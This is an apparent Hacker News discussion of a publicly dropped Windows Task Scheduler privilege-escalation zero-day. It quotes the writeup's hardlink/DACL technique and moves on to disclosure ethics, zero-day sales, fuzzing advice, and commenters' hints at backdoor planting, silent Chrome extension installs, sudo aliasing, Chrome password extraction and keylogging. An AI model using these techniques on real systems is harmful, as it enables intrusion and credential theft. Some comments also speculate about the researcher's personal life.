Here's the exploit description from the writeup .doc file that is included in the .rar file that's hosted on GitHub:
The task scheduler service has an alpc endpoint, supporting the method “SchRpcSetSecurity”.
The prototype looks like this:
long _SchRpcSetSecurity(
[in][string] wchar_t* arg_1, //Task name
[in][string] wchar_t* arg_2, //Security Descriptor string
[in]long arg_3);
Tasks created by the task scheduler will create a corresponding folder/file in c:\windows\system32\tasks.
This function seems to be designed to write the DACL of tasks located there, and will do so while impersonating.
However, for some reason it will also check if a .job file exists under c:\windows\tasks and try to set the DACL
while not impersonating.
Since a user, and even a user belonging to the guests group can create files in this folder, we can simply create
a hardlink to another file (all we need is read access).
Because of the hardlink, we can let the task scheduler write an arbitrary DACL
(see second parameter of SchRpcSetSecurity) to a file of our choosing.
So any file that we have read access over as a user and that system has the write DACL permission for,
we can pivot into full control and overwrite it.
> The task scheduler service has an alpc endpoint, supporting the method “SchRpcSetSecurity”. The prototype looks like this:
long _SchRpcSetSecurity(
[in][string] wchar_t* arg_1, //Task name
[in][string] wchar_t* arg_2, //Security Descriptor string
[in]long arg_3);
> Tasks created by the task scheduler will create a corresponding folder/file in c:\windows\system32\tasks. This function seems to be designed to write the DACL of tasks located there, and will do so while impersonating.
> However, for some reason it will also check if a .job file exists under c:\windows\tasks and try to set the DACL while not impersonating.
> Since a user, and even a user belonging to the guests group can create files in this folder, we can simply create a hardlink to another file (all we need is read access). Because of the hardlink, we can let the task scheduler write an arbitrary DACL (see second parameter of SchRpcSetSecurity) to a file of our choosing.
> So any file that we have read access over as a user and that system has the write DACL permission for, we can pivot into full control and overwrite it.
If you find the default font size too small, I know at least Chrome and Firefox support a minimum font size in their settings.
I personally set my minimum font size to 9. While I can't easily read font that small, I can at least notice it is there and zoom or otherwise compensate if I care what it says while still mostly preserving the aesthetic of the web page (assuming the font is purposefully small for a reason).
Thank you for the description, I was hesitant to download a .rar just to read something...
> So any file that we have read access over as a user and that system has the write DACL permission for, we can pivot into full control and overwrite it.
Doesn't this imply we can use guest access to install any kind of backdoor, since we'll have "read access" to a bunch of programs that start on boot? Seems really bad, maybe I'm misinterpreting (I haven't been on Windows for a while).
true that. Not even mentioning the insane amount of telemetry data they are "sending home" on regular basis. You think social network is bad? Well take a look on your AV...
I really did not get anything for this bug, and I know I'm probably forfeiting an acknowledgement
too right now. But I wasted alot of time on this bug, and nobody but me should be able to decide
what to do with it. People who criticize this type of behavior I find frankly annoying.
I used to be one of those self-righteous types, but I'm also pretty annoying, so perhaps there is a correlation.
Besides, this bug is way to silly in its complexity to be of any use to anyone.
I would not drop a full 0day exploit, which I can assure you,
I have totally sitting on my hard drive (not referring to this bug :).
For the people wondering why she released the exploit instead of claiming bounty on it, in the blog post[1] dated 14th June, she said she would not drop a full 0day exploit. I guess that changed when she did not get credit for her last bug (cve-2018-8314) according to her another blog post[2] from Aug 17th.
> I really did not get anything for this bug, and I know I'm probably forfeiting an acknowledgement too right now. But I wasted alot of time on this bug, and nobody but me should be able to decide what to do with it. People who criticize this type of behavior I find frankly annoying. I used to be one of those self-righteous types, but I'm also pretty annoying, so perhaps there is a correlation.
> Besides, this bug is way to silly in its complexity to be of any use to anyone. I would not drop a full 0day exploit, which I can assure you, I have totally sitting on my hard drive (not referring to this bug :).
Reading through the author's blog (links found further below) it would seem that on more than one occasion the author didn't receive credit, which presumably makes it harder to find new jobs.
The author's blog is also full of anti-social comments, which would sound awfully melodramatic if I didn't have personal experience with depression. Regardless, it is a public expression that she's going to be a fairly toxic person to work with, which is almost certainly working against her in the job hunt.
Earlier tweets from this account seem to indicate they believe MS intentionally sabotaged the process so that they could sell the bugs, including to oppressive governments:
I'm not understanding. Is this lady mad because she wants to get out of bug hunting, so she found a major MSFT bug and tried to sell it, and they patched it and thwarted her attempt at that?
> I'm also transgender. But my transition so far has been really difficult (social isolation, lack of support.. etc), my voice is still really manly and I don't really pass at all (which probably weirds people out.. so I would rather say it upfront so I don't need to have anxiety about it, I have alot of anxiety issues). I also have not been able to change my name yet, legally its still "Thomas".
- - -
w.r.t. the 0-day release: Well that's some seriously irresponsible stuff right there.
I think she has a tough time (she's transgender and doesn't have support from her peers). It's sad that she hasn't found a way to live a happy life although she clearly has serious skills. I hope she'll be fine.
It's just annoying that a lot of users are now at risk, I hope the patches will be installed ASAP.
It's honestly extremely difficult to get by in the first world as a white hat security researcher. Bug bounties payouts look big, but unless you're hitting a 10K bug a month you're better off with a Rails gig. And that will be very hit-or-miss, because who the hell knows if $COMPANY will play ball this time or not? Or if you're the first person to find the bug you spent weeks searching for?
Exploit development security research is something that there's a surprisingly small market for... unless you're selling vulns. And buyers are usually either government intelligence services or organized crime (skipping right past "what's the difference hyuk hyuk hyuk").
You're right! Penetration testing is one way to make money!
It sometimes can be perhaps slightly less lucrative than you might expect, with your average pen tester paid significantly less than your average SWE. And often somewhat different than the kind of specialty skills someone focused on (say) Windows Internals might have. Compare with selling exploits, where a month's worth of highly enjoyable work might turn into mid-five-figures. Or higher.
You're absolutely right. Penetration testing and code auditing are ways to make money. It's possible that there may be some relevant differences in both subject and compensation is all.
Finding exploits and performing a security audit are often very different tasks. A person that can do one is not always able to do the other.
Companies, such as companies that sell surveillance software to governments, do hire people to just find exploits, but judging by leaked emails that can be a stressful job as you are expected to regularly deliver new exploits.
If you sold to a country with standing sanctions, that could be an issue. 0-day's can also be considered munitions in some interpretations of law, though I am not a lawyer nor a weapons dealer.
I see, downvotes incoming. Maybe I should explain:
> I think she has a tough time (she's transgender and doesn't have support from her peers)
This is from her website, I don't like armchair-psychoanalysis, either:
> I'm also transgender. But my transition so far has been really difficult (social isolation, lack of support.. etc), my voice is still really manly and I don't really pass at all (which probably weirds people out.. so I would rather say it upfront so I don't need to have anxiety about it, I have alot of anxiety issues). I also have not been able to change my name yet, legally its still "Thomas".
Seems I was the only one who clicked on her website. The first question I've had in my mind: "What does this person feel? It's weird to publish 0-days on Twitter with a little bit of rant"
For the downvoters: Would love to know why you downvoted me. Maybe I can clarify some aspects.
I think you got downvoted for saying that full-disclosure is irresponsible.
Many people I've talked are in favor of full-disclosure and think that coordinated disclosure is long term dangerous as large companies with the resources to actually develop secure software are not sufficiently incentivized to do so under coordinated disclosure.
Edit: I've also noticed on HN that sometimes I will get downvoted really hard for no clear reason and then two weeks later HN will magically transform my downvotes into upvotes. Not really sure why that happens, maybe a wave of bot banning?
> Edit: I've also noticed on HN that sometimes I will get downvoted really hard for no clear reason and then two weeks later HN will magically transform my downvotes into upvotes. Not really sure why that happens, maybe a wave of bot banning?
Yup, I've seen this more recently but now the cycle is faster. My comments regularly get downvotes but then later in the evening they turned into upvotes.
Also back in Dec 2017, there was a huge wave of people shilling on reddit for ICOs and subreddits would regularly post what "HN users think" and "how to correct them".
You're being downvoted because it looks like your bringing in irrelevant information about her being transgender. Edit your comment putting the actual explanation first. The fact that shes transgender is only secondary, if that.
It absolutely is relevant. Imagine being born into a body of your opposite sex and having to deal with a society that isn't advanced enough to realize the binary genders arose out of industrial revolution for productivity efficiency to benefit the few. It still is this way but we don't have factory with prison like buildings to work in but we are all still feudal subjects.
I'd like to also point out that there is a very real cabal of HN nicks that is actively doing drive by downvotes on specific topics centring around LGBTQ+, immigration and ICOs.
I started seeing this back in 2014 and it correlated with the rise of r/the_donald. There are even amino groups that specifically coordinates such attacks. For instance, the Damore threads were really interesting. Within the first few hours of posting there were a lot of comments seemed off for HN userbase, defending trump and Damore's manifesto. Counter comments were flagged and downvoted.
We know reddit is under the influence of shills and HN is not exempt.
> I don't want to work in IT security anymore. All the industry bullshit ruined it for me. I can't even motivate myself anymore to bug hunt. But I have no other skills to make money with, I'm so screwed.
and
> Will sell to people in the eastern hemisphere too. I just want money so I can travel.
I can sympathize with her strife, but she is on the path to seriously burn bridges. I can't imagine many security focused companies would touch her with a 10 foot pole now that she publicly admitted that she is willing to sell a 0day for profit. Sure she is going through a rough time, but even when angry, you have to not say things you regret, especially online.
EDIT: Did not realize selling bugs outside of bug bounty programs and related bug programs was a normal thing. Now I know.
>I can't imagine many security focused companies would touch her with a 10 foot pole now that she publicly admitted that she is willing to sell a 0day for profit.
Selling 0days for profit isn't the issue. The more pressing issue, considering she seems to be desperately looking for an employer, is that she has aired her life openly, honestly, and unfiltered through the same channels as her professional work. Sorry, but any serious employer isn't going to hire somebody who is openly unstable, especially not the "suicidal/disappearing for months at a time" unstable.
I'd recommend reading the rest of her twitter posts, plus the content she has published on her website, to get a better idea of her character. While she has a moderate amount of technical ability in her specific niche, it's nowhere near the level that would justify hiring past all of the red flags.
It's unfortunate, but she really needs to re-invent her online presence by decoupling her severe emotional issues from her showcased professional work.
In the security industry, selling a 0day for profit is not taboo at all. Some of the most well known researchers openly do this, and they are very employable.
Some companies have policies that don’t allow you to sell them while employed there (it’s awkward when your employee sells a bug in software sold by a client/partner/competitor/supplier), but they wouldn’t generally blacklist anyone who had sold bugs in the past.
I think it's a grey area, and the seller has to do research into the buyer. It's kind of like if you're an authorized firearms dealer. There's no issue selling to the general population, but if you knowingly sell to someone who intends to use it for a crime, then you can get arrested. That's what the researcher who stopped the WannaCry worm was arrested for; the FBI had logs showing that he'd helped build a tool to spy on Android devices, and that he knew the buyer was going to use it to commit crimes.
Not all 0 day vendors are shady either. At an old employer, we were authorized to purchase 0 days with company money to use during penetration tests because they wanted us to emulate state-sponsored attacks. The vendor had a website for their company and customer support as well. Immunity Canvas also has an optional subscription for 0 days you can purchase to use with their framework.
Sure, under what theory of law wouldn't it be? I mean, assuming of course that there is no insider dealing here, that they didn't have any hand in creating the security vulnerability themselves (or inducing its creation), but that they only discovered something out there in the world, then they have the right to talk about that as they see fit. Or not, or sell it. There may be social consequences, and if they're employed by someone else there could be terms in their contract covering that or a range of other legal behavior, but publishing/selling true information one discovers is protected under general law (and common sense frankly). It could be different if the entity they were selling to was itself a criminal enterprise and they knew or should have known that ("a reasonable person would have"), but even that is not an issue for government agencies, or selling it to the responsible developer, or to generalist security middlemen companies that do things like buy these up and then sell special early notice to their clients or such. There are legal entities that are willing to pay for some exploits, and it's legal to sell to them.
Many security researches voluntarily have decided on a moral level that they care about general security welfare most of all and that following specific standards and timelines of disclosure will maximize that, but even with the same goal reasonable people can disagree there too right up until full disclosure immediately. Some are just paid for that, because like open source an organization might decide that better security overall will ultimately be good for their bottom line (like Google). And some people just want fame or to put food on the table via their unique marketable skills, which is their call too.
It's questionable, and doing it wrong can get you sued or worse. Here's [1] EFF advice on it, but as usual getting a lawyer knowledgeable in the area is your best bet.
Most people that publish play with fire but have learned some boundaries making it somewhat safe.
As a transgender person, this is all that happens in our lives to be honest. It's very tough to have anything but a 'rough time' when the general public views you weirdly, and your family/friends have completely abandoned you.
But these bridges aren't being burned as a result of this person being trans, the bridges are being burned as a result of this person dropping 0 days and associating the professional vuln research with personal anti-social posts.
I don't think you are contradicting prolikewh0a's point. To rephrase their point in terms of your language, it's difficult to not be (openly) anti-social if you feel like society is anti-you.
Not impossible and not necessarily excusable. Just... difficult.
>it's difficult to not be (openly) anti-social if you feel like society is anti-you.
This is really accurate. I've really had to work on making good decisions and working on some slight anger issues during my transition after pretty much all of my family abandoned me, a lot of my friends started making fun of me publicly or just abandoned me totally. It's a significant reason why I moved across the country to Seattle -- a more open and accepting area of the USA -- to make new friends and get a job that was very open to LGBT persons. It's still tough, but the life change, surrounding myself with people who support me, really helped.
Unfortunately, depression and anxiety don't really limit themselves to a specific domain, and the anxiety of gender dysphoria is pretty all-consuming since you can't really stop being reminded of it
Applying armchair psychology and a tiny bit of my own experience with trying to express frustration, I think this is using melodramatic/caricaturized negative articulation to express opposites to the point being made.
As in, this person wants the opposite of everything being stated, and they're frustrated to the point of saying "of course I want everything to be going as badly as it is". I honestly don't read this any other way.
I didn't mean in terms of a bug bounty. I meant in terms of trying to sell it to something like a foreign gov't or deep web entity. The other guy above said the same thing as you, I did not know at all that researchers sold bugs separately from bug bounty programs.
Frankly, the only reason this doesn't happen more often is that it's hard. Unless you know the right people, finding a buyer for a bug like this is nearly impossible these days. The more legitimate routes are easier, faster, and require less work -- for instance, no need to have a solid exploit, just a good write-up.
There are ethical issues surrounding brokers like Zerodium, Grugq, et. al. Specifically, that 95% of the time you know that bug is going to NSA, CIA, FBI, DoD, GCHQ, BND, Mossad, etc.
You're absolutely right. Many good, wonderful, amazing people consider that an ethical concern sufficient to stop them in their tracks!
It's perhaps possible that some people, in some scenarios, might be willing to compromise on the ethics of their situation in exchange for a significantly higher chance of a much, much higher payout.
EDIT:
To expand slightly, anyone in a position to pay out for bug bounties should consider carefully what they are willing to do to shift incentives towards ethical behavior. The ability to attack your systems is worth money to those who would do so. It should be worth more to you than to them. How much are you, hypothetical person making such choices, willing to spend?
It's perhaps unfair to expect highly skilled people to take a 90%+ discount on the value of their work in order to be more ethical. Ethics are incredibly important! But it can be difficult to argue that successfully in the face of a breathtaking ask.
Then the bug bounty programs can step up and pay what bugs are actually worth. The right bug in windows could decimate their entire os market, but most companies that i've seen tend to pay some flat rate for bugs.
Thus my point: until bug bounties are calculated to approach or exceed the black or grey-market value of exploits, they can't strongly push people towards ethical behavior.
Right now bug bounties seem mainly to serve as a way for skiddies in the third world with burp to make for-them-bank on trivial XSS vulns and for serious professionals to make a little extra money. And, y'know, to serve the PR purpose of being able to say you have a bug bounty program.
What stops someone from "leaking" the bug after getting paid, or getting paid multiple times for the same 0-day? You know, to even the playing field from just the TLAs from having all of the fun?
You get significantly more money - some exploits are worth $100-250k. You just need to ask in underground hacker forums and not on Twitter. But doing business with those guys is hard af because no one can trust each other.
A popular trade-off is to work for a government contractor. You can get that kind of money as a salary, and the trust issues are all taken care of. Having a real salary is helpful if you want to get a loan to buy a house. It evens out your finances.
Somebody like SandboxEscaper would qualify technically, but I have a feeling that running off randomly to foreign countries and hinting at a possible suicide would be disqualifying. The government frowns on that sort of stuff when sorting out trust issues.
Possibly because they didn't think there was a market for legitimate use of such information, and selling something for clear use in a criminal act is a different story, and may even be criminal in itself depending on circumstances. Even if the industry accepts that (not implying that it does), openly airing it might be a different matter.
Some level of assumption is often required to efficiently converse, so we just have to accept that occasionally the assumptions are a little more off base than we would like.
.. how could you not, the valley and the great tech industry are rife with libertarianism. 0-Days are a market like any other either companies pay researchers the market rate so they can fix their bugs before they get sued by their customers or they don't in which case any number of less reputable sources will pay for them.
Absolutely. I always thought that if you can find multiple 0days, you are good enough to land into any senior developer position in a few weeks. Is that not the case? And why? To me, being able to find 0days was always synonymous with "broad knowledge" + "out of the box thinking".
I always found that while I could probably spend 6-8 months studying to try to land a job at one of the big tech companies to do RE/security research/malware analysis or whatever you want related to that, I usually got more interested in reverse engineering something new and quickly got bored reviewing the details of binary search trees.
Limits jobs at the big 4/5 as nearly every job that involves security research/RE will inevitably still have the standard leetcode algorithms whiteboard interview, but there's plenty of other stuff out there if you're willing to put together a decent portfolio. The few exceptions to that are being so famous you can make it to recognized teams, but that isn't a realistic goal for most engineers.
If there's a company you really, really want to work for, you can responsibly disclose something to them and at least get an in-person. Skip the phone algorithms test and go right to the whiteboard! Heck yeah.
Being good at reverse engineering, analysis, and programming are almost completely orthogonal to being able to implement 5 variations of search algorithms from memory on a whiteboard in syntactically correct code.
I'm not surprised. For me, the process of reporting to MS has gone:
1) Jump through a surprising number of hoops to set up a Windows 10 Insider channel machine, reproduction on which is required for their security program.
2) Email a write-up and PoCs to their security address.
3) Get back two emails naming a point of contact and dumping a pile of legal agreements they expect me to follow just for reaching out to them.
4) Receive no further contact or indications of progress.
Fuzzers[1] as well as reverse engineering tools. For fuzzers there is both the publicly available ones like AFL [2] and custom/closed source ones. It seems to me every zero day author has their own fuzzers or fuzzing frameworks or at least a closed fork of an open source fuzzer. But to me finding the bug is less difficult then turning it into an exploit. Shoot you can still find bugs in modern software by bit flipping, as an example I wrote a fuzzer that opened up random PDF files and flipped some bits at random and then opened them with Preview. it did this about 40,000 times a day and after a couple days I would come back and my mac had kernel panicked. Now turning one of these PDF files that cause kernel panics into an exploit is going to require significantly more effort then writing and running a dumb fuzzer.
wow....that is pretty interesting. how do you write your own fuzzer, seems like that's where the edge comes from? How much more of an effort is it to write an exploit? Is it necessary to build a Proof of Concept or is simply disclosing the vulnerability enough?
If I buy ADA what software/API can I start tinkering with?
What you described seems like so much fun but scared of the writing exploit part. Now that seems really hard especially considering it needs to be fully undetectable for a long time until the buyer gets their return on investment.
Is there a course or resource I can use to begin this path?
I love love poking around with things to see how they work....basically the chase or the process is what I enjoy most and curious to know more.
> wow....that is pretty interesting. how do you write your own fuzzer, seems like that's where the edge comes from? How much more of an effort is it to write an exploit? Is it necessary to build a Proof of Concept or is simply disclosing the vulnerability enough?
Dumb fuzzers can be written in anywhere from a day to a few weeks of work, smart fuzzers can take several years to write, also lots of fuzzers continually evolve over time because they have to. Its the Red queen effect[1], fuzzers keep finding bugs so they have to keep getting better to keep finding harder and harder to find bugs in a target codebase. So I would say an exploit is usually the harder task but some of the things smart fuzzers like SAGE[2] do would be incredibly hard to implement.
> If I buy ADA what software/API can I start tinkering with?
I'm not sure what ADA is. However for testable software I would go for programs that come installed on your operating system of choice. So in my case I was using MacOS at the time so I was targeting MacOS default applications.
> What you described seems like so much fun but scared of the writing exploit part. Now that seems really hard especially considering it needs to be fully undetectable for a long time until the buyer gets their return on investment.
Fuzzer development and exploit development are pretty different tasks. Fuzzer development is basically normal software development, while exploit development at least with security mitigations turned on is an entirely different beast. For example in exploit development your going to need to know x86-64 assembly, as well as general memory layout, how a particular operating system implements ASLR[3] so you can bypass that. As well as bypassing DEP/NX[4] which is often done using ROP[5] and now recently newer techniques[6]. The fuzzer I was describing above was a dumb file mutation fuzzer which can be extremely simple. So first it was a file fuzzer, meaning it fuzzed programs that take files as inputs, stuff like video and music players or in my case pdf files. The mutation part means the fuzzer took existing valid files and added random mutations as opposed to generative fuzzers that build semi valid files from scratch. The dumb part means it didn't do cool stuff like AFL that use a genetic algorithm and probe system to better test code paths in a target program.
> Is there a course or resource I can use to begin this path?
Search fuzzers online until you've seen every/most pages, no joke thats basically what I did theres a few books but most of the info they have can be found online for free. Also make sure to try building a fuzzer or two, go simple at first. As well as using existing opensource fuzzers like AFL, Trinity and syzkaller.
> How did you get into all of this?
I forget how I got into fuzzing but I did try and start a fuzzing company a few years ago, but it turns out its way easier making money doing web development then selling fuzzing software or doing bug bounties for a living.
A good place to start is learning how to poke at some API, and fizzers are a good way to do that. Pick some API that you think is complex (often places with previous bugs still have bugs), find a way to bang on it with all sorts of malformed data until something happens (crash, fault, or such). When you find that, you now have a set of inputs that the API is not sanitized against. Then you can try to disassemble, using tools like IdaPRO (best, but expensive), free reversing tools, kernel debuggers, etc. to get a handle on what is going wrong. At some point you might find the precise error at the assembly level. Then you may try to craft your inputs to bypass checks and affect the underlying system in a way you control. Here there are an astounding number of tricks and ways to bypass various security features, and you will have to read extensively to get a large bag of tricks for this step.
Now you have a decent exploit.
Each of these steps takes learning through just doing it and reading. You'll learn tools for various pieces of the game. But it's doable with decent effort.
what API or software should I start with? Also, @SandboxEscaper mentions logic based exploits vs memory based ones which are disappearing (?), what is she referring to?
also any good resources on starting this journey. I'm very serious about this because it potentially could be a dream job for me.
Start by looking up an exploit that has details published, and recreate it. Do that a few times, and you will begin to understand how it works without the frustration of not finding anything. As you get better you'll both get better at finding things and at dealing with the long periods of not feeling like you're making progress. I suspect there's sites that help you walk through this, and I know I've seen ones that walk you through prepared exploits.
You really just have to start putting in legwork consistently.
I also love the idea of digital prepping (? Not sure if there's a real term for it). Even just jokingly preparing to have a set of tech work after some kind of apocalypse. UPS/solar driven home LAN with a server running copies of wiki, stack overflow, various other resources. Maybe a bunch of music/movies/games. Whatever would assist us if we lost the internet and power grids.
I don't actually think that's likely to happen, but I absolutely do enjoy some mild prepping just for fun and because the effort is so low I might as well be prepared (we have a bugout bag, extensive first aid kit, all the basic tools and survival gear, etc).
It's also just handy to have this stuff around and "own" it rather than always depend on others to be there for us.
I've often wondered about obtaining my own copy of wikipedia (and other knowledge) to put on a portable device. It would be very useful when I jump in my time machine to travel back in time. I'm going to need to know how to build things so that I can become the "winner" of history. Of course, as history would show us if we learned, when you upset the apple cart, the establishment usually eliminates the threat. So, that's the last piece I haven't worked out yet. Oh, and the time traveling bit.
Not terribly terrified. At best it seem to be a Medium IL to SYSTEM. In other words a slightly better UAC bypass than most, but I don't think you can use it to escape from a browser sandbox for example.
People always seem to overlook this distinction... escalating admin privileges is typically one of the easier things for a hacker to do. Getting in is the harder part (ie, remote/browser exploits, etc).
I'm not really sure if that is true. Adobe exploits are pretty cheap and unless your target is in software you can usually get a click on a link one way or another.
Really, to me, the hard part is getting in without needing to have the user consciously do anything since then you're in and nobody could even have noticed you doing something.
> Really, to me, the hard part is getting in without needing to have the user consciously do anything
That's why I said remote/browser, everything else is noisy and therefore the 'easy' route. Usually this is sufficient for low tech nation states because they attack organizations not individuals, so all you need is a weak human link where noisey isn't a big deal. Then moving horizontally across the organization.
But more importantly OS are terribly insecure and privesc bugs are a dime a dozen. You don't need zero days to achieve that the vast majority of the time.
Yeah, sorry, a no-click / remote exploit is hard. I agree with you there.
But a browser exploit isn't. They're a dime a dozen. Also, I'm surprised that email is still a primary vector that's used to get people to click on links with their work computer. It seems like such a monitored method compared to, say, a LinkedIn contact.
Have they changed their policy on UAC not being considered security barrier on administrator accounts since W10? Windows was screwed for a long time[1], in practice not much better than running in SYSTEM all the time like in Windows 95 days.
I'm not sure even sure they will ever change it. It was designed for Vista using a security model that now corresponds to the "always ask" setting, and hastily changed to propose the two other settings for Windows 7 because users were thinking it asked too often. But the other settings do not even correspond to a sound security model, so there are hundreds or maybe thousands of bypass in Windows if using those, which include the setting by default. That's why MS simply declared that it is not a security boundary, because they had no sound model to make it work against. It's a "best effort" casual mitigation.
Several of these are patched every month. It’s a non-event for the most part. If somebody was targeting you personally, it isn’t going to be a local privilege escalation bug that closes the gap for them.
From what I gather this is privilege escalation for a attacker that already has arbitrary code execution. It is serious but not "shut everything down immediately" serious. Malware or malicious apps you already have could be made more dangerous.
It looks like a local privilege escalation per the comments elsewhere in the post. That's bad, but a low-ish risk to casual use of a personal device unless it's combined with some other way to get your system to execute an attacker's binary.
As a hacker I can assure you that I can just easily annoy you with UAC pop-ups until you click "Ok". So it doesn't really add much and you don't need SYSTEM to do great harm, anyways.
You can install Chrome extensions without the user noticing (built this in the past) which gives you access to basically everything without even resorting to DLL injections (I don't share this because it's dangerous and can't be fixed by the Chromium team). Reminder: It's possible to hijack 2FA and online banking with this method. I've read the source code of Zeus and SpyEye, I can do the same thing a) without AV detection and b) without DLL injections (which are very easy to spot).
If you know the Win32 APIs, it's extremely easy to build malicious software that doesn't need escalated privileges.
edit: I'm pretty sure I can implement it on Mac and Linux, too. I don't like the sentiment that those systems are more secure, it's just the difference in usage.
edit2: I can recommend Sandboxie. Please use it to get a little bit more security.
I'm genuinely curious how you'd go about doing what you describe.
I'm vaguely aware that Chrome has a mechanism to silent-install extensions, IIRC when they're placed in the filesystem in a certain way, specified in the registry, or configured via GP. I don't remember which, but I think they install silently. Failing all that, you can probably just extract the extension into the Chrome profile folder and on next restart it'll pick it up.
You saying it "gives you access to basically everything" makes me think you're doing one of the techniques above, which does bypass the permissions dialogs.
And sure, "Access all data on all websites you visit" would grant you the ability to see everything in every webpage and do what you're describing.
I honestly wouldn't mind knowing which Win32 APIs you're referring to. Perhaps you could drop a couple of them, so I get a ballpark idea of which direction you're going in with that.
Finally, the reason I'm writing this comment, really, is that I'm _most_ curious how you'd implement "it" on macOS and Linux too. I 100% agree that both are just as vulnerable as Windows in their own ways but have less market share. I would be extremely interested to hear some of the ways you'd particularly go about attacking Linux, which I use everyday.
> Failing all that, you can probably just extract the extension into the Chrome profile folder and on next restart it'll pick it up.
No, this would be a security hazard. All the mentioned ways require admin privileges or even group policy privileges. I'm doing it without any permissions.
Chrome hardened the process to protect their users. They're doing the best they can, but the Win-APIs are too powerful and there is no sandbox (like those for Mac) in place. Officially, all ways (registry keys, files, ...) require admin privileges for a very good reason.
Mac has its own sandbox and Linux offers SELinux and I was talking about a security vulnerability I have written for Windows specifically, that's why I gave the tip for Sandboxie.
> Perhaps you could drop a couple of them, so I get a ballpark idea of which direction you're going in with that.
> I would be extremely interested to hear some of the ways you'd particularly go about attacking Linux, which I use everyday.
Sorry, I can't talk about this specific attack in detail because this vulnerability can't be fixed. It's conceptually fairly simple and <400 LoC and I'm sure you can find it on your own if you're determined.
For Linux and security: If you're not constantly monitoring your running processes and bash scripts, privilege escalation and others can be easily pulled off (e.g. simply aliasing sudo). As an example, it's extremely simple to extract all stored passwords from Chrome and others [1]. That's the reason I prefer to use separate password managers (most of them protect their address space), although you can easily hack them as well. That's the reason I prefer encrypted virtual drives - it's unconventional and most tools don't cover it so the hacker has to search for them manually. Security is mainly making it more difficult to find the stuff, it's nearly impossible to hide it completely (otherwise the user wouldn't be able to access it, too).
It's a big field, so I don't really know what what you're interested in. You can find exploits on https://www.exploit-db.com and look for things that are interesting for you. For most of the pwnage, you don't need any exploits (except the chain of remote exploits to get in). As soon as you're in, you can do anything without any problems - getting root user, keylogging [2] (very easy for X11), injecting shared libraries (especially easy on Linux with LD_LIBRARY_PATH) and other stuff.
I would recommend sandboxing tools, network- and host-based IDS/IPS, a good firewall which also analyzes behavior patterns and a healthy amount of paranoia. Many AV systems are mainly security risks themselves and add a false sense of security, it's extremely easy to bypass them and their sandbox-analyzers.
> All the mentioned ways require admin privileges or even group policy privileges. I'm doing it without any permissions.
Oh, nice :)
> They're doing the best they can, but the Win-APIs are too powerful and there is no sandbox (like those for Mac) in place.
Hmmmm.
> Mac has its own sandbox and Linux offers SELinux and I was talking about a security vulnerability I have written for Windows specifically, that's why I gave the tip for Sandboxie.
I have to admit I've never really poked SELinux. My understanding of it is that because it was bolted-on, both architecturally and conceptually, that getting the most out of it is a real pain. This has put me off. :/ (heh)
>> I would be extremely interested to hear some of the ways you'd particularly go about attacking Linux, which I use everyday.
> Sorry, I can't talk about this specific attack in detail because this vulnerability can't be fixed. It's conceptually fairly simple and <400 LoC and I'm sure you can find it on your own if you're determined.
Righteo then writes program that generates all possible C programs <400 LoC long
In all seriousness, you definitely have me interested now :) I guess what might be a relevant question is, how universally applicable is it? Would it run on my minimally-configured Slackware box, for example?
And I am _very_ fascinated to hear that this "cannot be fixed". Are you describing a Linux-specific Spectre/Meltdown?
To be honest I'm not really sure what I'm interested in, you could sort of describe where I'm at as somewhat similar to your post 8 months ago about finding your passion. (In my case it's a resource thing.) I've started playing with X11 recently though, to the extent of just learning the wire protocol for fun.
I was actually thinking of making a tiny Xlib-less keylogger the other day, haha. (As in, talking to X via write()/read() directly.) Not quite sure why; perhaps the theoretically-interesting scenario of "not linking to libX11 might be less suspicious?" could be one explanation. I don't seem to need to give myself a rationale to stay motivated on my current track (woohoo), so I'm just tinkering for now.
Uh - getting root on Linux isn't exactly straightforward! Although there was that one time I found a very confused Docker installation (running Ubuntu on CentOS... I'd never used Docker before and could not figure out which way was up ("wat, I have yum AND ap--wait no now apt-get disappeared where did it go"), for about an hour lol) and this system may or may not have left /dev/vda1 in the Docker image... and it may have allowed me to mount it read-write from under the host system, with effective UID 0... ._. (IIRC, I think it was visudo that worked great.)
I wonder if there's a password manager that stores data in the kernel and/or uses the kernel's crypto keyring - and whether such effort would be worth it? (At least this would thwart local attacks, and only remote attacks via the Wi-Fi stack would work. xD)
I've fished forgotten passwords out of Login Data more times than I have fingers, I think. sqlite3 .dump + printf "$(sed 's/../\\x&/g')" FTW.
Linux's non-umbrella model, where there's no cohesive oversight, will be its undoing, I think.
On the subject of AV my favorite thing is https://github.com/taviso/loadlibrary :P (if just for the very non-official "you totally know Google is using this every day.")
One thing I was vaguely considering (last night, actually) was an idea I've had for a while - taking forensic memory-dump analysis tools to the next level and making them work in realtime with QEMU. End result being, you run a tool as root with the PID to a running QEMU instance, it attaches (possibly via process_vm_{read,write}v) and lets you watch VT streams, see keys+passwords being typed in SSH, perhaps take screenshots, see the process tree, etc.
A friend of mine is running SmashTheStack. He has build an IT sec company in the past (and sold it), maybe you can learn something from the war games. People from Project Zero and very clever people from Stanford are active in the community - those are top-notch hackers.
It's very low-level stuff, but if you like, try to hack those servers. Have fun!
